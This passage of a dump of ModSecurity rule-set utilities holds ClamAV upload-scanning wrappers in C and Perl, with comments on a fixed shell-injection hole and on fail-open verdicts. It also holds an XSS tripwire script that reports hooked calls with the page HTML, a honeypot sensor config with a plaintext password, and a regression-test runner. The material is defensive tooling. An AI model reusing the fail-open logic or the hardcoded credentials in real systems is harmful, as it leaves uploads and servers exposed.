modsec_proxy_exchange[1024]; EXTERN char modsec_proxy_ext_ips[1024]; EXTERN char 
modsec_rpc_password_file[1024]; EXTERN char modsec_mui_ui_admin[1024]; EXTERN char modsec_mui_ui_ipaddress[1024]; EXTERN char modsec_mui_ui_port[1024]; EXTERN char modsec_cli_home[1024]; EXTERN char sensor_id[1024]; EXTERN char serial[1024]; EXTERN char version_number[1024]; EXTERN char bridge_mode[1024]; EXTERN char data_disk_space[1024]; EXTERN char release_date[1024]; EXTERN char conn_rate[1024]; EXTERN char conn_rate_per_addr[1024]; EXTERN char conns[1024]; EXTERN char conns_per_addr[1024]; �����������SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/av-scanning/runAV/comp��������������������������������0000775�0000000�0000000�00000000124�12164572564�0025621�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������gcc -c -o common.o -DEXTERN= common.c gcc -o runAV -DEXTERN=extern common.o runAV.c 
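/* File: SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/av-scanning/runAV/runAV-clamd.c */
#include "common.h"

/*
 * Write path into dst as one single-quoted shell word.
 *
 * Embedded single quotes are emitted as '\'' and a path that starts with
 * '-' gets a "./" prefix so the scanner cannot take it for an option.
 * Returns 0 on success, -1 when the result does not fit into dst_size bytes.
 */
static int quote_path_for_shell(const char *path, char *dst, size_t dst_size)
{
    size_t used = 0;
    const char *p;

    if (dst_size < 3)
        return -1;
    dst[used++] = '\'';
    if (path[0] == '-') {
        if (used + 2 + 2 > dst_size)
            return -1;
        dst[used++] = '.';
        dst[used++] = '/';
    }
    for (p = path; *p; p++) {
        /* Every append leaves room for the closing quote and the NUL. */
        if (*p == '\'') {
            if (used + 4 + 2 > dst_size)
                return -1;
            memcpy(dst + used, "'\\''", 4);
            used += 4;
        } else {
            if (used + 1 + 2 > dst_size)
                return -1;
            dst[used++] = *p;
        }
    }
    dst[used++] = '\'';
    dst[used] = '\0';
    return 0;
}

/*
 * Scan the file named by argv[1] with clamdscan and print a one-line
 * verdict. The first field is "1" when the upload is to be accepted and "0"
 * when it is to be rejected, followed by a short reason.
 *
 * The file name is quoted before it is placed in the command string.
 * run_cmd() closes its stream with pclose(), so the string is presumably
 * executed through popen() and a shell (confirm); pasting the raw argument
 * in, as the previous sprintf() did, let shell metacharacters in the name
 * run as commands.
 */
int main(int argc, char *argv[])
{
    /* static: two MAX_OUTPUT_SIZE buffers are too large to sit comfortably
     * on the stack */
    static char cmd[MAX_OUTPUT_SIZE];
    static char output[MAX_OUTPUT_SIZE];
    size_t prefix_len;
    int error;
    char *colon;
    char *keyword;

    if (argc <= 1)
        return 0;

    strcpy(cmd, "/usr/bin/clamdscan --no-summary ");
    prefix_len = strlen(cmd);
    if (quote_path_for_shell(argv[1], cmd + prefix_len, sizeof(cmd) - prefix_len) != 0) {
        printf ("0 invalid file name");
        return 0;
    }

    output[0] = '\0';
    error = run_cmd(cmd,output,MAX_OUTPUT_SIZE);
    if (error != 0) {
        /* NOTE(review): fail-open. When the scanner cannot be run the file
         * is reported as acceptable. Kept as is; a deployment that must
         * fail closed needs a "0" verdict here. */
        printf ("1 exec error %d: OK", error);
    } else if (!*output) {
        /* NOTE(review): fail-open as well (no scanner output at all). */
        printf ("1 exec empty: OK");
    } else {
        /* Scanner output has the form "<file>: <result>". */
        colon = strstr(output, ":");
        if (colon && colon[1] != '\0')
            colon += 2;
        else
            colon = NULL;       /* nothing after the colon to parse */

        if (!colon) {
            printf ("0 unable to parse clamdscan output [%s] for cmd [%s]", output, cmd);
        } else if ((keyword = strstr(colon, " FOUND")) != NULL) {
            *keyword = '\0';
            printf ("0 clamdscan: %s", colon);
        } else if ((keyword = strstr(colon, " ERROR")) != NULL) {
            *keyword = '\0';
            printf ("0 clamdscan: %s", colon);
        } else if ((keyword = strstr(colon, "OK")) != NULL) {
            printf ("1 clamdscan: OK");
        } else if ((keyword = strstr(colon, "Empty file")) != NULL) {
            printf ("1 empty file");
        } else if ((keyword = strstr(colon, "Can't access file ")) != NULL) {
            printf ("0 invalid file %s", keyword+18);
        } else {
            printf ("0 unable to parse clamdscan output [%s] for cmd [%s]", output, cmd);
        }
    }
    return 0;
}

/* File: SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/av-scanning/runAV/runAV.c */
#include "common.h"

/*
 * Write path into dst as one single-quoted shell word.
 *
 * Embedded single quotes are emitted as '\'' and a path that starts with
 * '-' gets a "./" prefix so the scanner cannot take it for an option.
 * Returns 0 on success, -1 when the result does not fit into dst_size bytes.
 */
static int quote_path_for_shell(const char *path, char *dst, size_t dst_size)
{
    size_t used = 0;
    const char *p;

    if (dst_size < 3)
        return -1;
    dst[used++] = '\'';
    if (path[0] == '-') {
        if (used + 2 + 2 > dst_size)
            return -1;
        dst[used++] = '.';
        dst[used++] = '/';
    }
    for (p = path; *p; p++) {
        /* Every append leaves room for the closing quote and the NUL. */
        if (*p == '\'') {
            if (used + 4 + 2 > dst_size)
                return -1;
            memcpy(dst + used, "'\\''", 4);
            used += 4;
        } else {
            if (used + 1 + 2 > dst_size)
                return -1;
            dst[used++] = *p;
        }
    }
    dst[used++] = '\'';
    dst[used] = '\0';
    return 0;
}

/*
 * Scan the file named by argv[1] with clamscan and print a one-line
 * verdict. The first field is "1" when the upload is to be accepted and "0"
 * when it is to be rejected, followed by a short reason.
 *
 * The file name is quoted before it is placed in the command string.
 * run_cmd() closes its stream with pclose(), so the string is presumably
 * executed through popen() and a shell (confirm); pasting the raw argument
 * in, as the previous sprintf() did, let shell metacharacters in the name
 * run as commands.
 */
int main(int argc, char *argv[])
{
    /* static: two MAX_OUTPUT_SIZE buffers are too large to sit comfortably
     * on the stack */
    static char cmd[MAX_OUTPUT_SIZE];
    static char output[MAX_OUTPUT_SIZE];
    size_t prefix_len;
    int error;
    char *colon;
    char *keyword;

    if (argc <= 1)
        return 0;

    strcpy(cmd, "/usr/bin/clamscan --no-summary ");
    prefix_len = strlen(cmd);
    if (quote_path_for_shell(argv[1], cmd + prefix_len, sizeof(cmd) - prefix_len) != 0) {
        printf ("0 invalid file name");
        return 0;
    }

    output[0] = '\0';
    error = run_cmd(cmd,output,MAX_OUTPUT_SIZE);
    if (error != 0) {
        /* NOTE(review): fail-open. When the scanner cannot be run the file
         * is reported as acceptable. Kept as is; a deployment that must
         * fail closed needs a "0" verdict here. */
        printf ("1 exec error %d: OK", error);
    } else if (!*output) {
        /* NOTE(review): fail-open as well (no scanner output at all). */
        printf ("1 exec empty: OK");
    } else {
        /* Scanner output has the form "<file>: <result>". */
        colon = strstr(output, ":");
        if (colon && colon[1] != '\0')
            colon += 2;
        else
            colon = NULL;       /* nothing after the colon to parse */

        if (!colon) {
            printf ("0 unable to parse clamscan output [%s] for cmd [%s]", output, cmd);
        } else if ((keyword = strstr(colon, " FOUND")) != NULL) {
            *keyword = '\0';
            printf ("0 clamscan: %s", colon);
        } else if ((keyword = strstr(colon, " ERROR")) != NULL) {
            *keyword = '\0';
            printf ("0 clamscan: %s", colon);
        } else if ((keyword = strstr(colon, "OK")) != NULL) {
            printf ("1 clamscan: OK");
        } else if ((keyword = strstr(colon, "Empty file")) != NULL) {
            printf ("1 empty file");
        } else if ((keyword = strstr(colon, "Can't access file ")) != NULL) {
            printf ("0 invalid file %s", keyword+18);
        } else {
            printf ("0 unable to parse clamscan output [%s] for cmd [%s]", output, cmd);
        }
    }
    return 0;
}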
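#!/usr/bin/perl
#
# runav.pl
# Copyright (c) 2004-2011 Trustwave
#
# This script is an interface between ModSecurity and its
# ability to intercept files being uploaded through the
# web server, and ClamAV
#
# It prints one line. The first field is 1 when the file may be accepted
# (clean or empty) and 0 when it must be rejected (infected, scanner error,
# or output that could not be parsed); a short reason follows.

use strict;
use warnings;

# NOTE(review): resolved through PATH; an absolute path avoids picking up a
# different binary when PATH is not under the administrator's control.
my $CLAMSCAN = "clamscan";

if ($#ARGV != 0) {
    print "Usage: modsec-clamscan.pl <filename>\n";
    exit;
}

my ($FILE) = shift @ARGV;

# Keep a name that starts with '-' from being read as a scanner option.
$FILE = "./$FILE" if $FILE =~ m/^-/;

# Run the scanner without a shell. The previous version interpolated the
# file name into a backtick command line, so shell metacharacters in the
# name were executed. The list form of open() passes each element to the
# program as a separate argument.
my @cmd = ($CLAMSCAN, '--stdout', '--disable-summary', $FILE);

my $input = '';
if (open(my $scan, '-|', @cmd)) {
    local $/;                       # read everything the scanner prints
    my $captured = <$scan>;
    $input = $captured if defined $captured;
    # The close status reflects the scanner's exit code; the verdict is
    # taken from its output instead, so the status is deliberately ignored.
    close($scan);
}

# Only the first line of the scanner output is evaluated. If the scanner
# could not be started or printed nothing, the message stays empty and the
# default verdict below (reject) applies.
my $error_message = '';
if ($input =~ m/^(.+)/) {
    $error_message = $1;
}

my $output = "0 Unable to parse clamscan output [$error_message]";

if ($error_message =~ m/: Empty file\.?$/) {
    $output = "1 empty file";
}
elsif ($error_message =~ m/: (.+) ERROR$/) {
    $output = "0 clamscan: $1";
}
elsif ($error_message =~ m/: (.+) FOUND$/) {
    $output = "0 clamscan: $1";
}
elsif ($error_message =~ m/: OK$/) {
    $output = "1 clamscan: OK";
}

print "$output\n";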
���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/browser-tools/����������������������������������������0000775�0000000�0000000�00000000000�12164572564�0024322�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/browser-tools/js-overrides.js�������������������������0000664�0000000�0000000�00000004363�12164572564�0027302�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������(function() { // don't leak XSSTripwire into global ns /* Assumptions: - we need to run first, before any other attacker script - we can't prevent tripwire from being detected (e.g. 
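       by side effects)

    Todo:
    - a lot more in lockdown
    - protect XHR
    */

    var XSSTripwire = new Object();

    /**
     * Notify the server that a hooked function was called.
     *
     * POSTs "HTML=<url-encoded document.body.outerHTML>" to
     * XSSTripwire.ReportURL (set by the hook just before it calls this).
     * Reporting is best-effort: a failure here must never break the page
     * function that triggered it, so every error is swallowed.
     *
     * NOTE(review): the report carries the whole rendered page body, which
     * can include whatever sensitive data the page displays.
     */
    XSSTripwire.report = function() {
        var notify, results;
        try {
            notify = XSSTripwire.newXHR();
            if (!notify) {
                return; // no XHR implementation available
            }
            // Create a results string to send back
            try {
                results = "HTML=" + encodeURIComponent(document.body.outerHTML);
            } catch (e) {} // we don't always have document.body
            notify.open("POST", XSSTripwire.ReportURL, true);
            notify.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
            notify.send(results);
        } catch (err) {
            // best-effort only
        }
    };

    /**
     * Freeze obj[name] so that a later script cannot swap the hook out.
     *
     * configurable:false alone only prevents deleting or redefining the
     * property; a plain assignment (obj[name] = ...) would still replace
     * the hook. writable:false blocks that as well.
     * defineProperty can throw for some objects in older browsers; in that
     * case the hook stays installed but unlocked.
     */
    XSSTripwire.lockdown = function(obj, name) {
        if (Object.defineProperty) {
            try {
                Object.defineProperty(obj, name, {
                    configurable: false,
                    writable: false
                });
            } catch (e) {}
        }
    };

    /**
     * Create an XMLHttpRequest object, falling back to the ActiveX variants.
     * Returns false when none is available.
     */
    XSSTripwire.newXHR = function() {
        var xmlreq = false;
        if (window.XMLHttpRequest) {
            xmlreq = new XMLHttpRequest();
        } else if (window.ActiveXObject) {
            // Try ActiveX
            try {
                xmlreq = new ActiveXObject("Msxml2.XMLHTTP");
            } catch (e1) {
                // first method failed
                try {
                    xmlreq = new ActiveXObject("Microsoft.XMLHTTP");
                } catch (e2) {
                    // both methods failed
                }
            }
        }
        return xmlreq;
    };

    /**
     * Replace obj[name] with a wrapper that reports the call and then,
     * when exec_original is true, runs the original function with the same
     * `this` and arguments. The wrapper is locked down afterwards.
     */
    XSSTripwire.proxy = function(obj, name, report_function_name, exec_original) {
        var original = obj[name];
        obj[name] = function() {
            // URL of the page to notify, in the event of a detected XSS event:
            XSSTripwire.ReportURL = "xss-tripwire-report?function=" + encodeURIComponent(report_function_name);
            XSSTripwire.report();
            if (exec_original) {
                return original.apply(this, arguments);
            }
        };
        XSSTripwire.lockdown(obj, name);
    };

    // Functions commonly used by XSS probes and payload decoders.
    XSSTripwire.proxy(window, 'alert', 'window.alert', true);
    XSSTripwire.proxy(window, 'confirm', 'window.confirm', true);
    XSSTripwire.proxy(window, 'prompt', 'window.prompt', true);
    XSSTripwire.proxy(window, 'unescape', 'unescape', true);
    XSSTripwire.proxy(document, 'write', 'document.write', true);
    XSSTripwire.proxy(String, 'fromCharCode', 'String.fromCharCode', true);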
})();�����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/honeypot-sensor/��������������������������������������0000775�0000000�0000000�00000000000�12164572564�0024655�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/honeypot-sensor/README.md�����������������������������0000664�0000000�0000000�00000001137�12164572564�0026136�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������The purpose of these files is to turn your current ModSecurity host into a pseudo-honeypot sensor by doing the following: 1. Instructs Apache to listen for traffic on multiple unused ports - 8000 - 8080 - 8888 2. Creates Apache virtual host containers to bind to these ports. 3. If any traffic is received on these ports, then ModSecurity will inspect the traffic by inheriting any rules specified in the main Apache configuration. 4. ModSecurity's Audit Engine will use the mlogc program to forward the audit log entry onto the ModSecurity Project's central logging server. 
���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/honeypot-sensor/mlogc-honeypot-sensor.conf������������0000664�0000000�0000000�00000006732�12164572564�0032007�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������########################################################################## # Required configuration # At a minimum, the items in this section will need to be adjusted to # fit your environment. The remaining options are optional. ########################################################################## # Points to the root of the installation. All relative # paths will be resolved with the help of this path. CollectorRoot "/var/log/mlogc" # ModSecurity Console receiving URI. You can change the host # and the port parts but leave everything else as is. ConsoleURI "http://204.13.200.239/rpc/auditLogReceiver" # Sensor credentials SensorUsername "honeypot-sensor" SensorPassword "test1234" # Base directory where the audit logs are stored. This can be specified # as a path relative to the CollectorRoot, or a full path. LogStorageDir "data" # Transaction log will contain the information on all log collector # activities that happen between checkpoints. The transaction log # is used to recover data in case of a crash (or if Apache kills # the process). 
TransactionLog "mlogc-transaction.log" # The file where the pending audit log entry data is kept. This file # is updated on every checkpoint. QueuePath "mlogc-queue.log" # The location of the error log. ErrorLog "mlogc-error.log" # The location of the lock file. LockFile "mlogc.lck" # Keep audit log entries after sending? (0=false 1=true) # NOTE: This is required to be set in SecAuditLog mlogc config if you # are going to use a secondary console via SecAuditLog2. KeepEntries 0 ########################################################################## # Optional configuration ########################################################################## # The error log level controls how much detail there # will be in the error log. The levels are as follows: # 0 - NONE # 1 - ERROR # 2 - WARNING # 3 - NOTICE # 4 - DEBUG # 5 - DEBUG2 # ErrorLogLevel 3 # How many concurrent connections to the server # are we allowed to open at the same time? Log collector uses # multiple connections in order to speed up audit log transfer. # This is especially needed when the communication takes place # over a slow link (e.g. not over a LAN). MaxConnections 10 # How many requests a worker will process before recycling itself. # This is to help prevent problems due to any memory leaks that may # exists. If this is set to 0, then no maximum is imposed. The default # is 1000 requests per worker (the number of workers is controlled by the # MaxConnections limit). MaxWorkerRequests 1000 # The time each connection will sit idle before being reused, # in milliseconds. Increase if you don't want ModSecurity Console # to be hit with too many log collector requests. TransactionDelay 50 # The time to wait before initialization on startup in milliseconds. # Increase if mlogc is starting faster then termination when the # sensor is reloaded. StartupDelay 5000 # How often is the pending audit log entry data going to be written # to a file. The default is 15 seconds. 
CheckpointInterval 15 # If the server fails all threads will back down until the # problem is sorted. The management thread will periodically # launch a thread to test the server. The default is to test # once in 60 seconds. ServerErrorTimeout 60 # The following two parameters are not used yet, but # reserved for future expansion. # KeepAlive 150 # KeepAliveTimeout 300 ��������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/honeypot-sensor/modsecurity_crs_10_honeypot.conf������0000664�0000000�0000000�00000001711�12164572564�0033167�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# # Add in honeypot ports. # - These are common proxy ports used by attackers # - All traffic accepted on these ports are suspicious. # Listen 8000 Listen 8080 Listen 8888 # # Create basic virtual host containers that will forward all traffic received # to the official ModSecurity Project honeypot logging host. # # - You should adjust the Document root location to an empty directory on your server # - Also adjust the path to your local ModSecurity mlogc program and for the # mlogc-honeypot-sensor.conf file. # - Make sure you main SecAuditLogType is set to concurrent mode. 
# <VirtualHost *:8000 *:8080 *:8888> ServerName www.example1.com DocumentRoot "/usr/local/apache/honeypot-htdocs" <Directory "/usr/local/apache/honeypot-htdocs"> Options none AllowOverride None Order allow,deny Allow from all </Directory> SecAuditEngine On SecAuditLog "|/usr/local/apache/bin/mlogc /usr/local/apache/conf/mlogc-honeypot-sensor.conf" </VirtualHost> �������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/regression-tests/�������������������������������������0000775�0000000�0000000�00000000000�12164572564�0025021�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/regression-tests/INSTALL������������������������������0000664�0000000�0000000�00000001206�12164572564�0026051�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������INSTALLATION STEPS: 1) Edit the rulestest.pl script to define local path to perl 2) Edit the ruletest.conf script to define the proper global settings for: - servers to test - path to the modsecurity audit log 3) Copy the testserver.cgi script to the /cgi-bin directory if you wish to test the outbound/response rules. 4) Edit the modsecurity_crs_10_setup.conf file and update/enable the Regression Testing variable settings. 
5) Copy/Symlink the modsecurity_crs_59_header_tagging.conf file to the activated_rules directory 6) Restart Apache 7) Run the rulestest.pl script using the rules files in the local /tests directory. ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/regression-tests/README�������������������������������0000664�0000000�0000000�00000007237�12164572564�0025712�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������ ModSecurity Rules regression testing suite ========================================== Rules regression test tool installation: ---------------------------------------- Test should be run from the same host ModSecurity runs on, or a computer that has file system access to ModSecurity audit log (see %modseclog in step 5) 1. Copy rulesregtest.pl, rulesregtest.conf and test files to a directory on the server. 2. Put testserver.cgi in the server's /cgi-bin directory (required only if outbound tests are used) 3. Set ModSecurity to use serial logging. 4. Ensure that the web server response with 200 to access the home page (since default tests use "/" as the URL) 5. Edit rulesregtest.conf: - Server address and port (%server directive). The default (127.0.0.1:80) may be OK. - Location of ModSecurity audit log file (%modseclog directive). 
Writing tests: -------------- Write a text file with the following directives: %test <name> - starts a test and set is name (used for report) %status <number> - sets the expected status code %event <string> - set a string to search in the audit log of the test. You can use multiple directives to define many required patterns. For example: %event [id "960009"] %output <string> - set a string to search in the HTTP response. You can use multiple directives to define many required patterns. %request – multiple lines of the request on the following lines, terminated by the next directive (a line starting with "%"). A request can include variables using perl notation ($var). this would be replaced when testing with a value set by the %var directive. - Note: Do not forget to leave an empty line as required by HTTP. The script locks otherwise. - Note: Content-Length has to be calculated manually. Finding bugs ------------ The following directives will help to find the problems: %verbose – will output request, reply and new ModSecurity audit log lines for the current test. %relevant – will output verbose output for tests that failed. Variable replacement: --------------------- %var variable=value, value, value….. - Set values for a variable, the test would be repeated using every value. Values are set only for the current test. Multiple %var directives for the same variable add values to the list and do not replace values, so: %var variable=value1 %var variable=value2 Would test with both value1 and value2. If multiple variables are used in the same test, than the test is carried for each combination of values of the variables: %var var1=v1, v2 %var var3=v3, v4 The test would be repeated 4 times with the test vectors (v1, v3), (v1, v4), (v2, v3), (v2, v4). 
Testing responses: ------------------ To force response content in request, use /cgi-bin/testserver.cgi as the target URL and add one or more of the following headers to the reuqest: Response-Status - Force a response status line. Defaults to "200 OK". Response-Content - Adds the string to the response. Note that this would not be the entire response. Response-Content-Type - sets the value of the content type header, defaults to "text/html" Response-Header-Name - Add a header to the response. This defined the new header's name. Response-Header-Value defines the header's value. Response-Header-Value - The value of the new header defined by the request header Response-Header-Name. Note: If Response-Header-Name is empty, then this parameter will be ignored. ** NOT IMPLEMENTED YET ** Response-File - the name of a file to use as the entire response. Name is reletive to the $RESPONSE_FILE_DIR in the testserver.cgi sctip. ** NOT IMPLEMENTED YET ** �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity_crs_59_header_tagging.conf��������������������������������������������������������������0000664�0000000�0000000�00000004641�12164572564�0034361�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000�SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/regression-tests���������������������������������������������������������������������������������������������������������# # This section is only used during regression testing to externalize the matched # rule IDs in response headers so the testing client can verify matches from # remote 
ModSecurity installs. # # WARNING: You do not want this in normal operations as this will expose # the inner workings of your ModSecurity configurations. # # Must enable/configure the TX:REGRESSION_TESTING variable in the # modsecurity_crs_10_setup.conf file. # SecRule &TX:REGRESSION_TESTING|TX:REGRESSION_TESTING "@eq 0" "phase:4,t:none,nolog,id:'981228',pass,skipAfter:END_RESPONSE_HEADER_TAGGING" SecRule TX:ANOMALY_SCORE "@eq 0" "phase:4,id:'981229',t:none,nolog,pass,skipAfter:END_RESPONSE_HEADER_TAGGING" SecRule TX:/^\d*\-/ "." "phase:4,id:'981230',t:none,nolog,pass,setvar:tx.counter=+1,setenv:matched_rule-%{tx.counter}=%{matched_var_name},setenv:anomaly_score=%{tx.anomaly_score},setenv:sql_injection_score=%{tx.sql_injection_score},setenv:xss_score=%{tx.xss_score}" Header append X-WAF-Events "%{matched_rule-1}e" env=matched_rule-1 Header append X-WAF-Events "%{matched_rule-2}e" env=matched_rule-2 Header append X-WAF-Events "%{matched_rule-3}e" env=matched_rule-3 Header append X-WAF-Events "%{matched_rule-4}e" env=matched_rule-4 Header append X-WAF-Events "%{matched_rule-5}e" env=matched_rule-5 Header append X-WAF-Events "%{matched_rule-6}e" env=matched_rule-6 Header append X-WAF-Events "%{matched_rule-7}e" env=matched_rule-7 Header append X-WAF-Events "%{matched_rule-8}e" env=matched_rule-8 Header append X-WAF-Events "%{matched_rule-9}e" env=matched_rule-9 Header append X-WAF-Events "%{matched_rule-10}e" env=matched_rule-10 Header append X-WAF-Events "%{matched_rule-11}e" env=matched_rule-11 Header append X-WAF-Events "%{matched_rule-12}e" env=matched_rule-12 Header append X-WAF-Events "%{matched_rule-13}e" env=matched_rule-13 Header append X-WAF-Events "%{matched_rule-14}e" env=matched_rule-14 Header append X-WAF-Events "%{matched_rule-15}e" env=matched_rule-15 Header append X-WAF-Events "%{matched_rule-16}e" env=matched_rule-16 Header append X-WAF-Events "%{matched_rule-17}e" env=matched_rule-17 Header append X-WAF-Events "%{matched_rule-18}e" 
env=matched_rule-18 Header append X-WAF-Events "%{matched_rule-19}e" env=matched_rule-19 Header append X-WAF-Events "%{matched_rule-20}e" env=matched_rule-20 Header set X-WAF-Score "Total=%{anomaly_score}e; sqli=%{sql_injection_score}e; xss=%{xss_score}e" env=anomaly_score SecMarker END_RESPONSE_HEADER_TAGGING �����������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/regression-tests/rulestest.conf�����������������������0000664�0000000�0000000�00000001251�12164572564�0027721�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# Set to the address and port of the web server protected by the tested ruleset. # # TODO the web server has to respond with status code 200 to request for the # home page (/). This is usually the default configuration. # # TODO the script 'testserver' should be installed on this web server in the # /cgi-bin directory to facilitate outbound rules testing. # #%global server 127.0.0.1:80 # Set to the path to ModSecurity audit file # # TODO set ModSecurity for serial logging. 
# #%global mslog /usr/local/apache/logs/audit.log #%msdebug /usr/local/apache/logs/debug.log # # Set this to the appropriate web site domain name you are testing # %global var hostname=mysite �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/regression-tests/rulestest.pl�������������������������0000775�0000000�0000000�00000071624�12164572564�0027425�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/opt/local/bin/perl # # Copyright (C) 2006-2011 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details.# # For Internal Use only! # # Originally writtern by Ofer Shezaf # # !! todo: # !! ~ request for URI command in conf file # !! ~ Ensure headers terminators # !! read rulesets config file for event mane, policy and patterns # !! fuz patterns from config file # !! 
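# !! %include directive

use strict;
#use warnings;
#use diagnostics;

use IO::File;
use IO::Socket;
use IO::Select;
use HTTP::Request;
use HTTP::Response;
use Safe;
use Storable qw(dclone);
use Getopt::Long;
use Pod::Usage;

# -- Add library
use FindBin qw($Bin $Script);
use lib "$Bin";

use Data::Dumper;

STDOUT->autoflush(1);

# -- consts
# Request template used by the %uri directive; "$URI" is replaced per test.
# The empty line before END_SKEL terminates the HTTP header block.
our $SKELETON_REQUEST = <<END_SKEL
GET \$URI HTTP/1.0
Host: local
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

END_SKEL
;

# -- get options
# The state hash doubles as the GetOptions target: every option is stored
# under its primary (long) name, which is also the directive name in test files.
my $global_state = {
    'timeout' => '2',
    'fuzz'    => 1,
    'vars'    => {},
    'port'    => 80
};
$global_state->{'global'} = $global_state;

GetOptions (
    $global_state,
    'server|s:s',
    'hostname:s',
    'port|p:s',
    'timeout|t:f',
    'mslog:s',
    'msdebug:s',
    # -o and -i are stored under 'output' and 'input', the keys the rest of
    # the script reads; as bare 'o'/'i' the values were never picked up.
    'output|o:s',
    'input|i=s@',
    'run:s@',
    'from:s',
    'relevant|r!',
    'fuzz|f!',
    'clean!',
    'check!',
    'verbose|v!',
    'help|h|?',
    'man'
) || pod2usage (-exitstatus => 0, -verbose => 0);

pod2usage(-exitstatus => 1, -verbose => 1) if $global_state->{'help'};
pod2usage(-exitstatus => 1, -verbose => 2) if $global_state->{'man'};

push @{$global_state->{'input'}}, @ARGV;
pod2usage (2) if $#{$global_state->{'input'}} < 0;

# -- get list of test files
my $testfiles = [];
my ($progname) = ($Script =~ /(.*)\..*$/);
if (-e "$progname.conf") {
    push @$testfiles, "$progname.conf";
}
foreach my $arg (@{$global_state->{'input'}}) {
    push @$testfiles, glob $arg;
}
foreach my $file (@$testfiles) {
    if (!-e $file) {
        print STDERR "Error 101: test file $file not found\n";
        exit;
    }
}

my ($outfile, $outfilename);
if ($global_state->{'output'}) {
    # Explicit mode argument: the file name is never parsed for a mode or
    # pipe character, unlike the two-argument ">$name" form.
    $outfile = IO::File->new($global_state->{'output'}, '>');
    if (!$outfile) {
        # $! (not $@) carries the reason an open failed.
        print STDERR "Error 106: unable to create report file $global_state->{'output'}. $!\n";
        exit;
    }
    $outfilename = $global_state->{'output'};
}
else {
    $outfile = *STDOUT;
    $outfilename = 'STDOUT';
}

report_header($outfile, $outfilename);
foreach my $filename (@$testfiles) {
    parse_test_file ($outfile, $filename, $global_state);
}
exit (0);

# -- read an input file and execute tests in it
#    $outfile      - handle the report is written to
#    $filename     - tests file to read
#    $parent_state - state hash the file-level state is inherited from
sub parse_test_file {
    my ($outfile, $filename, $parent_state) = @_;

    my $file_state = inherit_state ($parent_state);
    report_file_header($outfile, $filename);

    my $linenumber = 0;
    my $testfile = IO::File->new($filename, '<');
    if (!$testfile) {
        print STDERR "Error 105: unable to open tests file $filename. $!\n";
        print $outfile "unable to open file";
        return;
    }

    my $state = $file_state;
    while (defined(my $line=<$testfile>)) {
        $linenumber++;
        $line = tchomp ($line);
        $state = parse_test_line ($line, $state, $testfile);
        # A non-reference return value is an error message string.
        if (!ref $state) {
            print STDERR "$state in file $filename at line $linenumber\n";
            print STDERR "line: $line\n" if $parent_state->{'check'};
            return;
        }
        # Run every test that the line just parsed has completed.
        while (my $test = shift @{$file_state->{'tests'}}) {
            run_test ($outfile, $test, $filename);
        }
    }
    # The last test of a file has no following %test/%endtest to close it.
    run_test ($outfile, $state, $filename) if $state->{'name'};
}

# -- parse the next input line
#    Returns the (possibly new) state hash, or an error message string.
sub parse_test_line {
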